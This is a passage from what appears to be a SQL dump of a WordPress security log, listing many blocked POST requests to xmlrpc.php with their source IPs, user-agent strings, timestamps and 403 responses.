Chrome\\/68.0.3440.106 Safari\\/537.36\"}','S7Wdj5a4Bz8c6krfv2OXFH0J',0,1679771332.7741,1545,'','POST',403,0,515,0,1,'',0),('68.178.193.183',1152565687,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','YapCR2xwvL7szcg9lur4EiAP',0,1679771340.8045,590,'','POST',403,0,515,0,1,'',0),('37.97.170.79',627157583,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','MdR5jVs1gmUvtQPKZawWe7C6',0,1679771352.3909,3376,'','POST',403,0,515,0,1,'',0),('194.243.52.182',3270718646,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','6QDUyH0gfIhea1Pn5rcbFViN',0,1679771356.1769,3579,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','yKo6138NsmOk9IvBYDVSHnPt',0,1679771357.5861,2309,'','POST',403,0,515,0,1,'',0),('198.71.226.45',3326599725,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','mrf7WDc6TYeglEZaOGCh0nQs',0,1679771361.5760,663,'','POST',403,0,515,0,1,'',0),('162.43.117.43',2720757035,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','oOKXdZ7lp4iEPvq8e5Qarnmu',0,1679775757.1114,3682,'','POST',403,0,515,0,1,'',0),('202.61.232.172',3393054892,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','vd8ntaOVYoXgKZiDW9jypRFQ',0,1679775776.9529,525,'','POST',403,0,515,0,1,'',0),('74.208.59.202',1255160778,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','7t0d8fbNT5vxjwPQMeKcFk6R',0,1679775782.6112,540,'','POST',403,0,515,0,1,'',0),('45.119.84.18',762795026,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','Bim59dkXEU4w2LqztgpvZMDO',0,1679775790.4611,551,'','POST',403,0,515,0,1,'',0),('68.178.145.146',1152553362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','3gO6YGCjIH5e7bDBNq0fvdTE',0,1679775795.8649,575,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','HSVfIJpR7GhsAKXWB1Zx5bCg',0,1679775810.2474,590,'','POST',403,0,515,0,1,'',0),('175.178.47.143',2947690383,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','syoTz9LZ8r4cFJX5kg01fihR',0,1679776423.3723,3772,'','POST',403,0,515,0,1,'',0),('162.0.232.117',2717968501,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','eokEcnhvW2Vw4u3JPGiRQLrf',0,1679776428.3721,641,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','KpTYIBF3sumyoUw6GQinNPAj',0,1679780114.1882,3755,'','POST',403,0,515,0,1,'',0),('51.68.11.207',860097487,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','kOx98gNlLryupa0RSUnKbcDh',0,1679780112.7872,5365,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','ELN4zTOWRKuqIDYeagxpM9v2',0,1679780124.0009,554,'','POST',403,0,515,0,1,'',0),('1.117.83.240',24466416,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','jAUW6emcfPM28nQClYtakgBi',0,1679780128.7371,570,'','POST',403,0,515,0,1,'',0),('68.178.244.46',1152578606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','rADLMJjzvkg21fm39YbxPKsQ',0,1679780140.7578,1047,'','POST',403,0,515,0,1,'',0),('198.38.86.87',3324401239,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','husveLOHNSMq2WGXFnxZb9w6',0,1679780142.9204,592,'','POST',403,0,515,0,1,'',0),('108.170.11.130',1823083394,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','msUTKpQDkEnJNAhXw2fluBe1',0,1679780155.7004,1273,'','POST',403,0,515,0,1,'',0),('185.6.139.121',3104213881,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','MwmWOcjBs7ZUu4S62ketVg0J',0,1679780158.9809,2559,'','POST',403,0,515,0,1,'',0),('152.32.234.87',2552293975,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','fYx2pkvZa4KI1bLBSdel7Djg',0,1679784638.6445,3509,'','POST',403,0,515,0,1,'',0),('136.243.219.190',2297682878,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','v9xrZqe2ahf1OFHTKsXw5UI6',0,1679784640.8608,1578,'','POST',403,0,515,0,1,'',0),('97.107.133.132',1634436484,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','msQnEKAXCfFV6IYxRJOrwc0p',0,1679785162.7743,683,'','POST',403,0,515,0,1,'',0),('91.201.52.205',1539912909,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','9qK6dBEbkCoWwjz7J3AO5SpF',0,1679785167.3592,826,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','EYySGnrk0Mue1cBxtLUIfw4m',0,1679785167.9787,773,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','fSzixBgydmC9qsh78uQUHAE6',0,1679785171.6030,642,'','POST',403,0,515,0,1,'',0),('185.182.56.34',3115726882,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','GsuRhvIlkerO0Sq2ygD8NCpT',0,1679785173.4700,577,'','POST',403,0,515,0,1,'',0),('184.168.99.50',3098043186,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','GzZ0hBOVr29t3YQTol7dRg8x',0,1679785179.5928,542,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','dVmJQk08RhKz3feaYMr1Uigv',0,1679789201.4261,2460,'','POST',403,0,515,0,1,'',0),('74.208.59.155',1255160731,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','pRa0O9JDhbcZHFsmPnCXgUi1',0,1679789199.2958,5344,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','o9PzRqax0pefjsBclQ8grKCw',0,1679789203.1383,1712,'','POST',403,0,515,0,1,'',0),('198.71.226.45',3326599725,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','2FqDECxH5jQ96yRdhoWtc1nY',0,1679789209.1896,941,'','POST',403,0,515,0,1,'',0),('37.97.226.64',627171904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','dE7wHRy1JML4YFqc9DfubITx',0,1679789211.5543,608,'','POST',403,0,515,0,1,'',0),('46.105.97.186',778658234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','Rq7QTAtlHUu19YNkawmey3bG',0,1679789229.3820,3315,'','POST',403,0,515,0,1,'',0),('45.119.84.18',762795026,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','eb3Mf4DTmSstx0vJECpYQ9nK',0,1679789235.1167,560,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','xMb4TqmQ26t0wyzPKNrRF8D3',0,1679789242.3898,633,'','POST',403,0,515,0,1,'',0),('31.177.95.88',531717976,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','3pKQgzXMiWHRhEPtNeGjZ9mT',0,1679789248.0682,571,'','POST',403,0,515,0,1,'',0),('69.174.53.190',1169044926,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','PVkYlifDheSJXjC6AnZv47dp',0,1679789254.7860,541,'','POST',403,0,515,0,1,'',0),('68.178.145.77',1152553293,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','tQabHR94ue3JWIBA2s8ScyoN',0,1679792207.7781,2389,'','POST',403,0,515,0,1,'',0),('51.68.230.210',860153554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','FZha1JL2KYwPQk709IWgfleM',0,1679792207.1999,3625,'','POST',403,0,515,0,1,'',0),('81.169.144.135',1370067079,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','kDiKLeZ2U0fYrzvmanBJP3uN',0,1679792215.0044,508,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','MA3UJ690IVYWzDxFcgfZXsvm',0,1679792222.1092,580,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','NBdZMvpwgGCsLHQ91jO0b8zo',0,1679792234.1228,582,'','POST',403,0,515,0,1,'',0),('74.208.59.202',1255160778,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','l90cUOIDTGbmxCAyXQqLo2NS',0,1679792245.3551,1211,'','POST',403,0,515,0,1,'',0),('49.235.183.178',837531570,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','hj3wgdcGp1YCQOVSoHPLa7AD',0,1679792245.6537,1108,'','POST',403,0,515,0,1,'',0),('185.6.139.121',3104213881,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','PpLzUtQsjW3yqaJkD5oEY9nX',0,1679792252.9408,657,'','POST',403,0,515,0,1,'',0),('175.41.217.33',2938755361,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','kYmiOXn9N4tsEjzbUpov80If',0,1679792270.3166,687,'','POST',403,0,515,0,1,'',0),('23.96.15.22',392171286,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','pEmZKNAeiuPC0n7lSozsJLWk',0,1679794292.1133,3598,'','POST',403,0,515,0,1,'',0),('184.168.99.50',3098043186,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','iumkcTr1XDPwhUQvqnaIKzCE',0,1679797488.6107,3939,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','eu9NEh5dBYXc0CJDra8lULA4',0,1679797491.5493,1409,'','POST',403,0,515,0,1,'',0),('23.96.15.22',392171286,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','hPZxlTNbci659KFMejkVsQ8a',0,1679797493.7413,570,'','POST',403,0,515,0,1,'',0),('8.210.217.51',148035891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','mDaFQM7vjqt0o5Wr4ZJ6VlEn',0,1679797496.8666,600,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','VRxiP5XDwOAUyFHr7zmKBqTM',0,1679797503.0859,836,'','POST',403,0,515,0,1,'',0),('184.168.99.50',3098043186,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','YVZco0A3N9Dn1HpOByLfa7KR',0,1679797504.7387,659,'','POST',403,0,515,0,1,'',0),('162.253.54.78',2734503502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Sjnh7VJ4LQOUYk93fX5cwsR6',0,1679797525.5646,537,'','POST',403,0,515,0,1,'',0),('97.74.229.3',1632298243,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BA7nzjpwscDWXU4RSlaCfT8K',0,1679801682.7792,871,'','POST',403,0,515,0,1,'',0),('202.61.232.172',3393054892,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','1VJlcE7XYujGzZKpnaNq4sbh',0,1679801684.7861,578,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','hfFABirSo4pUn7vjd2mH3uDc',0,1679801692.1188,2443,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','JuZze924BC7oNKmxA5achrM8',0,1679801697.6558,549,'','POST',403,0,515,0,1,'',0),('173.231.220.206',2917653710,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','NiEYAoK90Q61pRImDSwBLghX',0,1679801705.1507,656,'','POST',403,0,515,0,1,'',0),('185.107.213.64',3110851904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','8650D3KxniAgJ4dQhOmcaZkH',0,1679801706.6924,603,'','POST',403,0,515,0,1,'',0),('148.72.232.52',2487806004,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','01K2pCachgI97ortSAGBUqb4',0,1679801714.6295,591,'','POST',403,0,515,0,1,'',0),('64.227.108.223',1088646367,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','oZ2cVaNpCF4OMrjTxt8lJbW3',0,1679801719.2692,598,'','POST',403,0,515,0,1,'',0),('91.211.244.49',1540617265,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','o7XRV5LIAs4tCpdv8kuEWQT0',0,1679801726.5273,582,'','POST',403,0,515,0,1,'',0),('68.65.123.34',1145142050,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','MjYfuJvpyhc0rnW8IwVZ14oR',0,1679806005.8960,3958,'','POST',403,0,515,0,1,'',0),('45.124.84.123',763122811,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','sg108wBRcxhCe2nP73GHlSrI',0,1679806008.5754,1512,'','POST',403,0,515,0,1,'',0),('194.243.52.182',3270718646,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','jwXNeCFUEKoG4IOn2v86a0yl',0,1679806017.3495,779,'','POST',403,0,515,0,1,'',0),('34.172.150.73',581736009,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','zEBftdH5GQy4CYbDpITX7MaS',0,1679806024.1352,647,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','kc4dCiF7YhySVO3jqgfzMnLQ',0,1679806029.4724,550,'','POST',403,0,515,0,1,'',0),('184.168.102.44',3098043948,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','QspFxaEBAb8JUy7DiN4W5zqV',0,1679806037.9641,583,'','POST',403,0,515,0,1,'',0),('69.174.53.190',1169044926,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','dUJxXt3TDIAqaVS7fueRokYG',0,1679806039.3701,642,'','POST',403,0,515,0,1,'',0),('79.170.44.108',1336552556,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','KuGCc5J1aDByLV4StlHsXqNF',0,1679806051.1819,567,'','POST',403,0,515,0,1,'',0),('35.187.109.22',599485718,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','sv3AWEKzolq9GTktdZi8wxQM',0,1679806058.7320,622,'','POST',403,0,515,0,1,'',0),('82.165.86.170',1386567338,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','HJCtrcgdAeY9LKD213RlWBxG',0,1679810251.1676,723,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','TOMtGxUJX1LPgSf2vuAhE06s',0,1679810252.1923,570,'','POST',403,0,515,0,1,'',0),('8.210.217.51',148035891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','VvXwLK9FxUhbZ87EekWHsRgJ',0,1679810254.2177,574,'','POST',403,0,515,0,1,'',0),('185.182.56.188',3115727036,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','pgJWIEnitHdC59uXLYPU6aZQ',0,1679810259.7236,572,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5gHdIrpmqn8vOTaMLh9NQCiE',0,1679810266.6573,577,'','POST',403,0,515,0,1,'',0),('89.46.105.179',1496213939,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','q2fUD5ewEkxchrJZvWPA3YH9',0,1679810270.7517,575,'','POST',403,0,515,0,1,'',0),('162.253.54.78',2734503502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','ZUL12ORciTnpxsW7yelmfdMr',0,1679810283.1021,550,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','RpNwD9g4xokv3r7T5AtW0esy',0,1679810288.1466,570,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','ZfP17ptIDTHeg9VCGdJU5SvK',0,1679810298.6629,567,'','POST',403,0,515,0,1,'',0),('198.71.231.8',3326600968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','i1tIB6CQ7MN0DaXr2ekxEGRL',0,1679813031.4376,7405,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','lbuN1vj8fpZ4Y7iVLcMCJBeQ',0,1679813033.1841,5658,'','POST',403,0,515,0,1,'',0),('162.14.102.253',2718852861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 